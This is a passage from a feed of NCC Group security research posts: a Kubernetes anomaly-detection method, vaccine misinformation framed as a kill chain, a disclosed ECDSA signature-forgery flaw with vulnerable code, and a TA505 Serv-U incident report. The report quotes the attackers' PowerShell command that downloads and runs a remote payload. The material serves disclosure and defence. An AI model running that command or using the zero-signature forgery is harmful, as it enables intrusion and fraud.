The diagram shows a set of objects split into clusters based on their two features. It is trivial to see two large groups of points, cluster 1 and cluster 2, that have been grouped by feature similarity. The assumption is that any object in these clusters is normal. The anomaly is the red triangle: its features do not follow the pattern of the other objects, and it would therefore be worth further investigation.

Feature Extraction

The important part is choosing the right features to cluster on. We want to identify features of pod creation that remain consistent during normal activity (e.g., the user creating the pod and the registry of the container image), since changes in these would indicate suspicious behaviour. We also want to identify settings that could allow some form of privilege escalation, since changes in these settings could indicate a malicious pod being created. For this we consulted our internal Containerisation team; the features we decided upon are listed below, along with the JSON path to each field in the audit log.

  • Image Registry: the registry where the container image is stored; effective when a custom container registry is used (requestObject.spec.containers.image)
  • User: the user sending the request; effective when only a subset of users create pods (user.username)
  • Privileged Container: when enabled, the container has access to all devices on the host (requestObject.spec.containers.securityContext.privileged)
  • Mounted Volumes: which directories on the host the container has access to; mounting /host gives access to all files on the host (requestObject.spec.containers.volumeMounts.mountPath)
  • hostNetwork: when enabled, the container has access to any service running on localhost on the host (requestObject.spec.hostNetwork)
  • hostIPC: when enabled, the container shares the host’s IPC namespace, allowing inter-process communication with processes on the host (requestObject.spec.hostIPC)
  • hostPID: when enabled, the container shares the host’s PID namespace, allowing process listing of the host (requestObject.spec.hostPID)

Bringing it all together

Splunk contains a cluster command which is perfect for this use case. By creating a single string of the features delimited by a character of our choice, we can assign all pod creation events to a cluster. The exact time period to run the command over is subject to a trade-off between performance of the detection and performance of the query. The longer the lookback, the less chance of false positives, but the longer the time the query takes to run. After some trial and error, we found 14 days was a good middle ground but could be increased up to 30 days for smaller environments.

Once the cluster command has run, we can look for any events assigned to a cluster where the overall size of the cluster is relatively small. These will be events that are sufficiently different from the rest that we will want to flag them as suspicious and have an analyst investigate further.
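
The same idea can be sketched outside of a SIEM in a few lines of Python: build a delimited feature string per pod-creation event, count identical strings over the lookback window, and surface events belonging to rare groups. The feature names and the threshold below are illustrative, not the exact fields used in our Splunk queries:

```python
from collections import Counter

# Illustrative subset of the pod-creation features described above
FEATURES = ("user", "registry", "privileged", "hostNetwork")

def flag_anomalous_pods(events: list[dict], min_cluster_size: int = 2) -> list[dict]:
    """Group pod-creation events by an exact feature string and return
    the events whose group is smaller than min_cluster_size."""
    def key(event: dict) -> str:
        # Delimited feature string, as fed to Splunk's cluster command
        return "|".join(str(event.get(f)) for f in FEATURES)
    sizes = Counter(key(e) for e in events)
    return [e for e in events if sizes[key(e)] < min_cluster_size]

normal = {"user": "ci", "registry": "registry.local",
          "privileged": False, "hostNetwork": False}
odd = {"user": "admin", "registry": "docker.io",
       "privileged": True, "hostNetwork": True}
print(flag_anomalous_pods([normal] * 5 + [odd]))  # only the odd event
```

Real clustering functions tolerate partial matches between events rather than requiring exact equality, but the exact-match version above captures the core of the approach.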

Conclusions

To wrap things up: the use of Kubernetes is increasing, so detection engineering for this technology is becoming an important problem to tackle. Kubernetes audit logs allow us to tackle it, as they are a great source of events within the cluster and, importantly, are consistent across all platforms that run a Kubernetes cluster. A good detection engineering strategy has multiple layers and includes a variety of detections based on signatures, behaviours, and anomalies. For Kubernetes in particular, we want to focus our efforts on abuse of privileges and the creation of pods. There are multiple approaches to doing this, a few of which we have introduced in this post.

✇ NCC Group Research

Vaccine Misinformation Part 1: Misinformation Attacks as a Cyber Kill Chain

By: Swathi Nagarajan

The open and wide-reaching nature of social media platforms has led them to become breeding grounds for misinformation, the most recent casualty being COVID-19 vaccine information. Misinformation campaigns, launched by various sources for different reasons but working towards a common objective of creating vaccine hesitancy, have been successful in triggering and amplifying people’s cynicism and creating doubt about the safety and effectiveness of vaccines. This blog post discusses one of our first attempts within NCC Group to examine misinformation from the perspective of a security researcher, as part of our broader goal of using techniques inspired by digital forensics, threat intelligence, and other fields to study misinformation and how it can be combatted.

Developing misinformation countermeasures requires a multidisciplinary approach. The MisinfoSec Working Group, part of the Credibility Coalition – an interdisciplinary research committee which aims to develop common standards for information credibility – is developing a framework to understand and describe misinformation attacks using existing cybersecurity principles [1].

In this blog post, which is part 1 of a series, we take a page out of their book and use the Cyber Kill Chain attack framework to describe the COVID-19 vaccine misinformation attacks occurring on social media platforms like Twitter and Facebook. In the next blog post, we will use data from studies which analyze the effects of misinformation on vaccination rates to perform a formal risk analysis of vaccine misinformation on social media.

An Overview of the Cyber Kill Chain

The Cyber Kill Chain is a cybersecurity model which describes the different stages in a cyber-based attack. It was developed based on the “Kill Chain” model [2] used by the military to describe how enemies attack a target. By breaking down the attack into discrete steps, the model helps identify vulnerabilities at each stage and develop defense mechanisms to thwart attackers or force them to make enough noise to detect them.

Vaccine Misinformation Attacks as a Cyber Kill Chain

In this section, we use the Cyber Kill Chain defined by Lockheed Martin [3] to describe how misinformation attacks occur on social media. The goal is to study these attacks from a cybersecurity perspective in order to understand them better and come up with solutions by addressing vulnerabilities in each stage of the attack.

In this scenario, we assume that the “attackers” or “threat actors” are individuals or organizations whose objective is to create a sense of confusion about the COVID-19 vaccines. They could be motivated by a variety of factors like money, political agenda, religious beliefs, and so on. For instance, evidence was recently found to indicate the presence of Russian disinformation campaigns on social media [4][5] which attack the Biden administration’s vaccine mandates and sow distrust in the Pfizer and Moderna vaccines to promote the Russian Sputnik vaccine. Anti-vaccine activists, alternative health entrepreneurs and physicians have also been found to be responsible for a lot of the COVID-19 vaccine hoaxes circulating on social media sites including Facebook, Instagram and Twitter [6].

We also assume that the “asset” at risk is the COVID-19 vaccine information on social media, and the “targets” range from government and health organizations to regular users of social media.

Step 1: Reconnaissance

There are two types of reconnaissance:

  1. Passive reconnaissance: The attacker acquires information without interacting with the target actors. Since social media platforms are public, this kind of recon is easy for attackers to perform. They can monitor the activity of users with public profiles, follow trends, and study and analyze existing measures in place for thwarting misinformation spread. They can also find existing misinformation created both intentionally or as a joke (spoofs or satire) which they could later use out of context.
  2. Active reconnaissance: The attacker interacts with the target to acquire information. In this case, it could mean connecting with users having private profiles by impersonating a legitimate user, using phishing tactics to learn about the targets such as their political affiliation, vaccine opinions and vaccination status (if it is not already publicly available). The attacker could also create an account to snoop around and study other user activity, the social media platform activity and test the various misinformation prevention measures on a small scale.

Step 2: Weaponization

This stage involves the creation of the attack payload, i.e., the misinformation. These could be advertisements, posts, images, and links to websites which contain misinformation. The misinformation could be blatantly false information, semantically incorrect information or out-of-context truths. For example, conspiracy theories like “The COVID-19 vaccines contain microchips that are used to track people” [7] are blatantly false. Blowing the rare but serious side effects of the vaccine out of proportion is an example of misinformation as truth out of context. Deepfakes can also be used to create convincing misinformation. Spoof videos or misinformation generated accidentally that was already online could also be used by attackers to further their own cause [8].

A lot of social media platforms have been implementing tight restrictions on COVID-19 related posts, so it would be prudent for the attacker to create a payload which can circumvent those restrictions for as long as possible. 

Step 3: Delivery

Once the misinformation payloads are ready, they need to be deployed onto social media to reach the target people. This involves creating fake accounts, impersonating legitimate user accounts, making parody accounts/hate groups, and using deep undercover accounts that were created during the recon stage. The recon stage also reveals users or influencers whose beliefs align with the anti-vaccine misinformation which the attacker is attempting to spread. The attackers could convince these users – either through monetary means or by appealing to their shared objective – to spread the misinformation, i.e., deliver the payload.

Step 4: Exploitation

The exploitation stage in this scenario refers to the misinformation payloads successfully bypassing misinformation screeners used by the social media platforms (if they exist) and reaching the target demographic, e.g., anti-vaxxers and people who are on the fence about the vaccine.

Despite several misinformation prevention measures being used by various social media platforms (refer to Table 1), there still seems to be a significant presence and spread of misinformation online. Spreading misinformation on a large scale overwhelms the social media platforms [13] and adds complexity to their misinformation screening process, since it often requires manual intervention and the manpower available is small compared to the large volume of misinformation. A study found that some social media sites allowed advertisements with coronavirus misinformation to be published [14], suggesting that some countermeasures may not always be effectively implemented.

Facebook (and its apps) [9]:
– Remove COVID-19 related misinformation that could contribute to imminent physical harm, based on guidance from the WHO and other health authorities.
– Fact-checking to debunk false claims.
– Strong warning labels and notifications for posts containing misinformation which do not directly result in physical harm.
– Labelling forwarded/chain messages and limiting the number of times a message can be forwarded.
– Removing accounts engaging in repeated malicious activities.

Twitter [10]:
– Removing tweets containing the most harmful COVID-19 related misinformation.
– Applying labels to Tweets that may contain misleading information about COVID-19 vaccines.
– A strike-based system for locking or permanently suspending accounts violating the rules and policies.

Reddit [11]:
– User-aided content moderation.
– Banning or quarantining Reddit communities which promote COVID-19 denialism.
– A new reporting feature for moderators, allowing them to better provide a signal when they see community interference.

TikTok [12]:
– Fact-checking.
– Removing content, banning accounts, and making it more difficult to find harmful content, like misinformation and conspiracy theories, in recommendations or search.
– Threat assessments.

Table 1: Popular social media platforms and their measures to combat misinformation

The other vulnerability which attackers try to exploit has more to do with human nature and psychology. A study by YouGov [15] showed that 20% of Americans believe that it is “definitely true” or “probably true” that there is a microchip in the COVID-19 vaccines. The success of this conspiracy theory was attributed to the human coping mechanism of trying to make sense of things which cannot be explained, especially in times of uncertainty [16]. “Anti-vaxxers” have been around for a long time, and with the COVID-19 vaccines there is an even deeper sense of mistrust because of the short duration in which they were developed and tested. The overall handling of the COVID-19 pandemic by some government organizations has also been disappointing for the public. Attackers use this sense of chaos and confusion to their advantage to stir the pot further with their misinformation payloads.

Step 5: Installation

The installation stage of the cyber kill chain usually refers to malware installation by attackers on the target system after delivering the payload. With respect to vaccine misinformation attacks, this stage refers to rallying groups of people and communities towards the attacker’s cause, online and/or in physical locations. These users act as further carriers of the misinformation across various social media platforms, reinforcing it through reshares, reposts, retweets etc., leading to the misinformation gaining attention and popularity.

Step 6: Command and Control

Once the attacker gains control over users who have seen the misinformation and interacted with it, they can incite further conflict in the conversations surrounding the misinformation, such as through comments of a post. They can also manipulate users into arranging or attending anti-vax rallies or protest vaccine mandates, causing a state of civil unrest. 

Step 7: Actions on Objectives

It is safe to assume that usually the objective of attackers performing vaccine misinformation attacks is to lower vaccination rates. This objective can also be extended further and tied to other motives. For example, foreign state-sponsored misinformation attacks targeting US-developed vaccines, such as the Moderna and Pfizer mRNA vaccines, could have been created to suggest the superiority of vaccines developed in other nations.

It is important to realize that the purpose of misinformation campaigns is not always to convince people that things are a certain way – rather, it can simply be to sow doubt in a system, or in the quality of information available, making people more confused, overwhelmed, angry, or afraid. The sheer volume of misinformation available online has caused a state of hesitancy and cynicism about the safety and effectiveness of the vaccines, even among people who are not typically “anti-vax”. Attackers generally aim to plant seeds of doubt in as many people’s minds as possible rather than attempting to convince them not to take the vaccine, since confusion is often sufficient to reduce vaccination rates.

Defenses and Mitigations to the Misinformation Kill Chain 

The use of the Cyber Kill Chain allows us to not only consider the actions of attackers in the context of information security, but to also consider appropriate defensive actions (both operational and technical). In this section, we will elaborate on the defensive actions that can be taken against various stages in the Misinformation Kill Chain. 

In keeping with the well-known information security concepts of layered defense [17] and defense in depth [18], the countermeasures should support and reinforce each other so that, for example, if an attacker is able to bypass technical controls in order to deploy an attack, then staff should step up to respond appropriately and follow an incident response procedure. 

The increasing concern about misinformation on social media has resulted in studies by governments in several countries [19], which provide suggestions for combatting the issue, and indications of which countermeasures have been effective [20][21][22]. Some of the measures are applicable at multiple stages of the kill chain. For example, the labelling of misinformation is intended to make a user less likely to read it, less likely to share it and less likely to believe it. 

The following countermeasures can be applied at different stages of the kill chain, to help stem the propagation of misinformation and to limit its effectiveness: 

Step 1: Reconnaissance 

  1. Limiting the availability of useful metadata, tracking/logging site visits, and reducing the data that is visible without logging in, in order to limit information gathering about both individuals and aggregate populations of individuals.
  2. Limiting group interaction for non-members in order to restrict anonymous or non-auditable reconnaissance.
  3. Implementing effective user verification during account creation to prevent fake accounts.
  4. Educating users about spoofing attacks and encourage them to keep their profiles private and accept requests cautiously.

Step 2: Weaponization 

  1. Using effective misinformation screeners to block users from creating and posting ads, images, videos or posts with misinformation.
  2. Labelling misinformation or grading it according to reliability (based on effective identification), in order to allow users to make a more informed decision on what they read. 
  3. Removing misinformation (based on effective identification) to prevent it from reaching its target. 

Step 3: Delivery 

  1. Recognition or identification (followed by either removal or marking) of misinformation using machine learning (ML), human observation or a combination of both.
  2. Recognition or identification (followed by either removal or suspension) of hostile actors using machine learning (ML), human observation or a combination of both. 
  3. Identification and removal of bots, especially when used for hostile purposes.

Step 4: Exploitation 

  1. Public naming of hostile actors in order to limit acceptance of their posts and raise awareness of their motivations and credibility.
  2. Encouraging members of the medical field to combat the large volumes of misinformation with equally large volumes of valid and thoroughly vetted information about the safety and effectiveness of, in this case, the COVID-19 vaccines [22].
  3. Analyzing and improving the effectiveness of the misinformation prevention measures on social media platforms.
  4. Demanding and obtaining transparency and strong messaging from government organizations.

Step 5: Installation 

  1. Labelling misinformation or grading it according to reliability (based on effective identification).
  2. Tracking and removing misinformation (based on effective identification) in order to control its spread.

Step 6: Command and Control 

  1. Removal of groups or users with a record of repeatedly posting misinformation.
  2. Suspending accounts to influence better behavior, in the case of minor transgressions.

Step 7: Actions on Objectives 

  1. Media literacy education – not a short-term measure, but one reported as very effective in Scandinavia [22] and proposed as a countermeasure by the US DHS [20]. It increases the resilience of the public to misinformation on social media by teaching them how to identify fake news stories and differentiate between facts and opinions.
  2. Fact checking – a wider presence of easily accessible sources for the general public and for journalists may assist in wider recognition of misinformation and help to form a general habit of checking against a reliable source.
  3. Pro-vaccine messaging on social media – encourage immunizations on social media by emphasizing immediate and personalized benefits of taking the vaccines, rather than long-term protective or societal benefits, since studies in health communications have shown the former approach to be much more effective than the latter [24]. Studies have also shown that using visual rather than textual means can magnify those benefits [25].

In Part 2 of this blog post series: Risk Analysis of Vaccine Misinformation Attacks

Since social media is an integral part of people’s lives and is often a primary source of information and news for many users, it is safe to assume that it influences the vaccination rates and vaccine hesitancy among its users. This in turn affects the ability of the population to achieve herd immunity and increases the number of people who are more likely to die from COVID-19. Several studies have been conducted recently attempting to understand and quantitatively measure the effects of vaccine misinformation on vaccination rates. Each of these studies used different approaches and metrics across different social media platforms to perform the analysis, but they all conclude the same thing in the end – misinformation lowers intent to accept a COVID-19 vaccine. In our next post in this series, we will look at the results of these studies in more detail and use them to perform a risk analysis of misinformation attacks.

References:

[1] https://marvelous.ai/wp-content/uploads/2019/06/WWW19COMPANION-165.pdf

[2] https://en.wikipedia.org/wiki/Kill_chain

[3] https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/LM-White-Paper-Intel-Driven-Defense.pdf

[4] https://www.nytimes.com/2021/08/05/us/politics/covid-vaccines-russian-disinformation.html

[5] https://fortune.com/2021/07/23/russian-disinformation-campaigns-are-trying-to-sow-distrust-of-covid-vaccines-study-finds/

[6] https://www.npr.org/2021/05/13/996570855/disinformation-dozen-test-facebooks-twitters-ability-to-curb-vaccine-hoaxes

[7] https://www.forbes.com/sites/brucelee/2021/05/09/as-covid-19-vaccine-microchip-conspiracy-theories-spread-here-are-some-responses/?sh=65408061602d

[8] https://www.factcheck.org/2021/07/scicheck-spoof-video-furthers-microchip-conspiracy-theory/

[9] https://about.fb.com/news/tag/misinformation/

[10] https://help.twitter.com/en/rules-and-policies/medical-misinformation-policy

[11] https://www.reddit.com/r/redditsecurity/comments/pfyqqn/covid_denialism_and_policy_clarifications/

[12] https://newsroom.tiktok.com/en-us/combating-misinformation-and-election-interference-on-tiktok

[13] https://www.scientificamerican.com/article/information-overload-helps-fake-news-spread-and-social-media-knows-it/

[14] https://www.consumerreports.org/social-media/facebook-approved-ads-with-coronavirus-misinformation/

[15] https://docs.cdn.yougov.com/w2zmwpzsq0/econTabReport.pdf

[16] https://www.insider.com/20-of-americans-believe-microchips-in-covid-19-vaccines-yougov-2021-7

[17] https://www.ibm.com/docs/en/i/7.3?topic=security-layered-defense-approach

[18] http://www.nsa.gov/ia/_files/support/defenseindepth.pdf

[19] https://www.poynter.org/ifcn/anti-misinformation-actions/

[20] https://www.dhs.gov/sites/default/files/publications/ia/ia_combatting-targeted-disinformation-campaigns.pdf

[21] https://www.digitalmarketplace.service.gov.uk/g-cloud/services/101266738436022

[22] https://www.chathamhouse.org/2019/10/eu-us-cooperation-tackling-disinformation

[23] Hernandez RG, Hagen L, Walker K, O’Leary H, Lengacher C. The COVID-19 vaccine social media infodemic: healthcare providers’ missed dose in addressing misinformation and vaccine hesitancy. Hum Vaccin Immunother. 2021 Sep 2;17(9):2962-2964. doi: 10.1080/21645515.2021.1912551. Epub 2021 Apr 23. PMID: 33890838; PMCID: PMC8381841.

[24] https://msutoday.msu.edu/news/2021/ask-the-expert-social-medias-impact-on-vaccine-hesitancy

[25] https://www.pixelo.net/visuals-vs-text-content-format-better/

✇ NCC Group Research

Technical Advisory – Arbitrary Signature Forgery in Stark Bank ECDSA Libraries (CVE-2021-43572, CVE-2021-43570, CVE-2021-43569, CVE-2021-43568, CVE-2021-43571)

By: Paul Bottinelli
Vendor: Stark Bank's open-source ECDSA cryptography libraries
Vendor URL: https://starkbank.com/, https://github.com/starkbank/ 
Versions affected:
- ecdsa-python (https://github.com/starkbank/ecdsa-python) v2.0.0
- ecdsa-java (https://github.com/starkbank/ecdsa-java) v1.0.0
- ecdsa-dotnet (https://github.com/starkbank/ecdsa-dotnet) v1.3.1
- ecdsa-elixir (https://github.com/starkbank/ecdsa-elixir) v1.0.0
- ecdsa-node (https://github.com/starkbank/ecdsa-node) v1.1.2
Author: Paul Bottinelli [email protected]
Advisory URLs:
 - ecdsa-python: https://github.com/starkbank/ecdsa-python/releases/tag/v2.0.1
 - ecdsa-java: https://github.com/starkbank/ecdsa-java/releases/tag/v1.0.1
 - ecdsa-dotnet: https://github.com/starkbank/ecdsa-dotnet/releases/tag/v1.3.2
 - ecdsa-elixir: https://github.com/starkbank/ecdsa-elixir/releases/tag/v1.0.1
 - ecdsa-node: https://github.com/starkbank/ecdsa-node/releases/tag/v1.1.3
CVE Identifiers:
 - ecdsa-python: CVE-2021-43572
 - ecdsa-java: CVE-2021-43570 
 - ecdsa-dotnet: CVE-2021-43569 
 - ecdsa-elixir: CVE-2021-43568 
 - ecdsa-node: CVE-2021-43571 
Risk: Critical (universal signature forgery for arbitrary messages)

Summary

Stark Bank is a financial technology company that provides services to simplify and automate digital banking, by providing APIs to perform operations such as payments and transfers. In addition, Stark Bank maintains a number of cryptographic libraries to perform cryptographic signing and verification. These popular libraries are meant to be used to integrate with the Stark Bank ecosystem, but are also accessible on popular package manager platforms in order to be used by other projects. The node package manager reports around 16k weekly downloads for the ecdsa-node implementation while the Python implementation boasts over 7.3M downloads in the last 90 days on PyPI. A number of these libraries suffer from a vulnerability in the signature verification functions, allowing attackers to forge signatures for arbitrary messages which successfully verify with any public key.

Impact

An attacker can forge signatures on arbitrary messages that will verify for any public key. This may allow attackers to authenticate as any user within the Stark Bank platform, and bypass the signature verification needed to perform operations on the platform, such as sending payments and transferring funds. Additionally, the ability for attackers to forge signatures may impact other users and projects using these libraries in different and unforeseen ways.

Details

The (slightly simplified) ECDSA verification of a signature (r, s) on a hashed message z with public key Q and curve order n works as follows:

  • Check that r and s are integers in the range [1, n-1]; return Invalid if not.
  • Compute u1 = z·s^(-1) mod n and u2 = r·s^(-1) mod n.
  • Compute the elliptic curve point (x, y) = u1·G + u2·Q; return Invalid if (x, y) is the point at infinity.
  • Return Valid if r ≡ x (mod n), Invalid otherwise.

The ECDSA signature verification functions in the libraries listed above fail to perform the first check, ensuring that the r and s components of the signatures are in the correct range. Specifically, the libraries are not checking that the components of the signature are non-zero, which is an important check mandated by the standard, see X9.62:2005, Section 7.4.1/a:

1. If r’ is not an integer in the interval [1, n-1], then reject the signature.
2. If s’ is not an integer in the interval [1, n-1], then reject the signature.
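
In code, the mandated check is a simple range test. A minimal Python sketch follows (the function name and parameters are illustrative, not the library's actual API; N is the order of the NIST P-256 curve):

```python
# Order of the NIST P-256 curve, for illustration.
N = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551

def signature_in_range(r, s, n=N):
    """X9.62:2005, Section 7.4.1 steps 1-2: reject r or s outside [1, n-1]."""
    return 1 <= r <= n - 1 and 1 <= s <= n - 1

print(signature_in_range(0, 0))      # False: the all-zero signature is rejected
print(signature_in_range(1, N - 1))  # True: boundary values are acceptable
```

Performing this check before any arithmetic ensures that degenerate values such as r = 0 or s = 0 never reach the modular inversion and point multiplication steps.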

For example, consider the following excerpt of the verify function from the ecdsa-python implementation.

def verify(cls, message, signature, publicKey, hashfunc=sha256):
    byteMessage = hashfunc(toBytes(message)).digest()
    numberMessage = numberFromByteString(byteMessage)
    curve = publicKey.curve
    r = signature.r
    s = signature.s
    inv = Math.inv(s, curve.N)
    u1 = Math.multiply(curve.G, n=(numberMessage * inv) % curve.N, N=curve.N, A=curve.A, P=curve.P)
    u2 = Math.multiply(publicKey.point, n=(r * inv) % curve.N, N=curve.N, A=curve.A, P=curve.P)
    add = Math.add(u1, u2, A=curve.A, P=curve.P)
    modX = add.x % curve.N
    return r == modX

In that code snippet, the values r and s are extracted from the signature without any range check. An attacker supplying a signature equal to (r, s) = (0, 0) will not see their signature rejected. Proceeding with the verification, the function computes the inverse of the s component. Note that the Math.inv() function returns zero when supplied with a zero input (even though 0 does not admit an inverse). The code then computes the values u1 = inv * numberMessage * G and u2 = inv * r * Q, but since inv is zero, u1 and u2 will both be zero, i.e., the point at infinity, regardless of the values of numberMessage (the message hash, which we called z above) and Q (the public key). Subsequently, the implementation computes the intermediary curve point add by adding up the two previously computed points, which again results in the point at infinity. The final line checks that the r component of the signature is equal to the x-coordinate of the curve point, essentially checking that 0 == 0 for any message and any public key. Therefore, the signature (r, s) = (0, 0) is deemed valid by the code for any message, and under any public key.
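
The core of the failure can be reproduced with plain modular arithmetic. In the sketch below, buggy_inv is a hypothetical helper mimicking the described behavior of Math.inv (returning zero on a zero input); with s = 0, both scalars u1 and u2 vanish regardless of the message hash or public key:

```python
# P-256 curve order, for illustration.
n = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551

def buggy_inv(a, m):
    """Mimics an inverse routine that returns 0 for a zero input."""
    if a % m == 0:
        return 0
    return pow(a, -1, m)  # modular inverse (Python 3.8+)

r, s = 0, 0          # attacker-supplied forgery
z = 0xDEADBEEF       # stand-in for any message hash

inv = buggy_inv(s, n)
u1 = (z * inv) % n   # 0, so u1*G is the point at infinity
u2 = (r * inv) % n   # 0, so u2*Q is the point at infinity

# u1*G + u2*Q is the point at infinity; the flawed code then compares
# r (= 0) against its x-coordinate (treated as 0), so verification passes.
print(u1, u2)
```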

Recommendation

Users of the different Stark Bank ECDSA libraries should update to the latest versions. Specifically, versions greater than or equal to the following should be used.

  • ecdsa-python: v2.0.1
  • ecdsa-java: v1.0.1
  • ecdsa-dotnet: v1.3.2
  • ecdsa-elixir: v1.0.1
  • ecdsa-node: v1.1.3

Vendor Communication

2021-11-04 – NCC Group reported the vulnerability to Stark Bank developers.
2021-11-04 – Stark Bank acknowledged the issue and started fixing all vulnerable libraries.
2021-11-05 – Stark Bank confirmed that all vulnerable libraries were fixed.
2021-11-08 – Advisory published.

Thanks to

The support team at Stark Bank for their prompt acknowledgement and response, and Jennifer Fernick, Aaron Haymore, Kevin Henry, Marie-Sarah Lacharité, Thomas Pornin, Giacomo Pope and Javed Samuel at NCC Group for their support and careful review during the disclosure process.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date: 2021-11-08

Written by:  Paul Bottinelli

✇ NCC Group Research

TA505 exploits SolarWinds Serv-U vulnerability (CVE-2021-35211) for initial access

By: RIFT: Research and Intelligence Fusion Team

NCC Group’s global Cyber Incident Response Team has observed an increase in Clop ransomware victims in the past weeks. The surge can be traced back to a vulnerability in SolarWinds Serv-U that is being abused by the TA505 threat actor, a known cybercrime group notorious for extortion attacks using the Clop ransomware. We believe exploiting such vulnerabilities is a recent initial access technique for TA505, deviating from the actor’s usual phishing-based approach.

NCC Group strongly advises updating systems running SolarWinds Serv-U software to the most recent version (at minimum version 15.2.3 HF2) and checking whether exploitation has happened as detailed below.

We are sharing this information as a call to action for organisations using SolarWinds Serv-U software and incident responders currently dealing with Clop ransomware.

Modus Operandi

Initial Access

During multiple incident response investigations, NCC Group found that a vulnerable version of SolarWinds Serv-U server appeared to be the initial access used by TA505 to breach its victims’ IT infrastructure. The vulnerability being exploited is known as CVE-2021-35211 [1].

SolarWinds published a security advisory [2] detailing the vulnerability in the Serv-U software on July 9, 2021. The advisory mentions that Serv-U Managed File Transfer and Serv-U Secure FTP are affected by the vulnerability. On July 13, 2021, Microsoft published an article [3] on CVE-2021-35211 being abused by a Chinese threat actor referred to as DEV-0322. Here we describe how TA505, a completely different threat actor, is exploiting that vulnerability.

Successful exploitation of the vulnerability, as described by Microsoft [3], causes Serv-U to spawn a subprocess controlled by the adversary. That enables the adversary to run commands and deploy tools for further penetration into the victim’s network. Exploitation also causes Serv-U to log an exception, as described in the section below on checks for potential compromise.

Execution

We observed that Base64 encoded PowerShell commands were logged shortly after the Serv-U exceptions indicating exploitation. The PowerShell commands ultimately led to deployment of a Cobalt Strike Beacon on the system running the vulnerable Serv-U software.

The PowerShell command observed deploying Cobalt Strike was:

powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('hxxp://IP:PORT/a'))

Persistence

On several occasions the threat actor tried to maintain its foothold by hijacking a scheduled task named RegIdleBackup and abusing the COM handler associated with it to execute malicious code, leading to FlawedGrace RAT.

The RegIdleBackup task is a legitimate task that is stored in \Microsoft\Windows\Registry. The task is normally used to regularly backup the registry hives. By default, the CLSID in the COM handler is set to: {CA767AA8-9157-4604-B64B-40747123D5F2}. In all cases where we observed the threat actor abusing the task for persistence, the COM handler was altered to a different CLSID.

CLSID objects are stored in registry in HKLM\SOFTWARE\Classes\CLSID. In our investigations the task included a suspicious CLSID, which subsequently redirected to another CLSID. The second CLSID included three objects containing the FlawedGrace RAT loader. The objects contain Base64 encoded strings that ultimately lead to the executable.
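
When such Base64 strings are recovered from the registry, decoding them can quickly confirm whether they carry an executable. A small Python sketch (the sample string is hypothetical, chosen only to decode to a PE header) checks for the 'MZ' magic bytes of a Windows executable:

```python
import base64

def decode_registry_blob(b64_chunks):
    """Concatenate and decode Base64 strings pulled from CLSID objects."""
    return base64.b64decode("".join(b64_chunks))

# Hypothetical sample: the first bytes of a PE file, Base64 encoded.
payload = decode_registry_blob(["TVqQAAMAAAAEAAAA"])
print(payload[:2] == b"MZ")  # a PE executable starts with 'MZ'
```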

Checks for potential compromise

Check for exploitation of Serv-U

NCC Group recommends looking for potentially vulnerable Serv-U FTP servers in your network and checking their logs for traces of exceptions similar to those suggested by the SolarWinds security advisory. It is important to note that the publications by Microsoft and SolarWinds describe follow-up activity regarding a completely different threat actor than the one we observed in our investigations.

Microsoft’s article [3] on CVE-2021-35211 provides guidance on the detection of the abuse of this vulnerability. The first indicator of compromise for exploitation of this vulnerability is suspicious entries in a Serv-U log file named DebugSocketlog.txt, usually located in the Serv-U installation folder. This log file contains exceptions logged at the time of exploitation of CVE-2021-35211. NCC Group’s analysts encountered the following exception during their investigations:

EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive();

However, as mentioned in Microsoft’s article, this exception is not by definition an indicator of successful exploitation and therefore further analysis should be carried out to determine potential compromise.

Check for suspicious PowerShell commands

Analysts should look for suspicious PowerShell commands being executed close to the date and time of the exceptions. The full content of PowerShell commands is usually recorded in Event ID 4104 in the Windows Event logs.
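
Base64 encoded PowerShell commands, such as those mentioned earlier, wrap UTF-16LE text under the Base64 layer. A small Python sketch for decoding them during triage (the sample command here is benign and hypothetical, round-tripped for demonstration):

```python
import base64

def decode_powershell_command(b64):
    """PowerShell -EncodedCommand payloads are Base64 over UTF-16LE text."""
    return base64.b64decode(b64).decode("utf-16-le")

# Hypothetical benign sample, encoded and then decoded.
sample = base64.b64encode("Write-Output hello".encode("utf-16-le")).decode()
print(decode_powershell_command(sample))  # Write-Output hello
```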

Check for RegIdleBackup task abuse

Analysts should look for the RegIdleBackup task with an altered CLSID. Subsequently, the suspicious CLSID should be used to query the registry and check for objects containing Base64 encoded strings. The following PowerShell commands assist in checking for the existence of the hijacked task and suspicious CLSID content:

# Check for altered RegIdleBackup task
Export-ScheduledTask -TaskName "RegIdleBackup" -TaskPath "\Microsoft\Windows\Registry\" | Select-String -NotMatch "{CA767AA8-9157-4604-B64B-40747123D5F2}"

# Check for suspicious CLSID registry key content
Get-ChildItem -Path 'HKLM:\SOFTWARE\Classes\CLSID\{SUSPICIOUS_CLSID}'

Summary of checks

The following steps should be taken to check whether exploitation led to a suspected compromise by TA505:

  • Check if your Serv-U version is vulnerable
  • Locate Serv-U’s DebugSocketlog.txt log file
  • Search for entries such as ‘EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive();’ in this log file
  • Check for Event ID 4104 in the Windows Event logs surrounding the date/time of the exception and look for suspicious PowerShell commands
  • Check for the presence of a hijacked Scheduled Task named RegIdleBackup using the provided PowerShell command
    • In case of abuse: the CLSID in the COM handler should NOT be set to {CA767AA8-9157-4604-B64B-40747123D5F2}
  • If the task includes a different CLSID: check the content of the CLSID objects in the registry using the provided PowerShell command, returned Base64 encoded strings can be an indicator of compromise.
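
The log check above can be sketched as a minimal triage helper in Python (the marker string comes from this post; the log path varies per installation, and a hit warrants further analysis rather than proving compromise):

```python
from pathlib import Path

# Exception string associated with exploitation of CVE-2021-35211 (see above)
EXCEPTION_MARKER = "EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive()"

def find_suspect_entries(logfile: str) -> list:
    """Return (line number, line) pairs from a Serv-U DebugSocketlog.txt
    that contain the exploitation-related exception. A hit is an indicator
    for further triage, not proof of compromise."""
    hits = []
    text = Path(logfile).read_text(errors="replace")
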